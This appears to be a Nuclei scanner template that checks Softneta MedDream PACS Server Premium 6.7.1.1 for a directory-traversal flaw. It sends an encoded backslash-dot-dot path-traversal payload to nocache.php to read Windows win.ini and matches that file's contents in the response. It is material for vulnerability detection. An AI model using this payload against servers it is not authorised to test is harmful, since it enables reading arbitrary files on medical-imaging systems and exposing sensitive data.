id: sofneta-mecdream-pacs-server-lfi

info:
  name: Softneta MedDream PACS Server Premium 6.7.1.1 - Directory Traversal
  author: 0x_akoko
  severity: high
  description: Softneta MedDream PACS Server Premium 6.7.1.1 - Directory Traversal
  reference: https://www.exploit-db.com/exploits/45347
  tags: sofneta,lfi

requests:
  - method: GET
    path:
      - "{{BaseURL}}/pacs/nocache.php?path=%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cWindows%5cwin.ini"

    stop-at-first-match: true
    matchers:
      - type: word
        words:
          - "bit app support"
          - "fonts"
          - "extensions"
        condition: and
        part: body
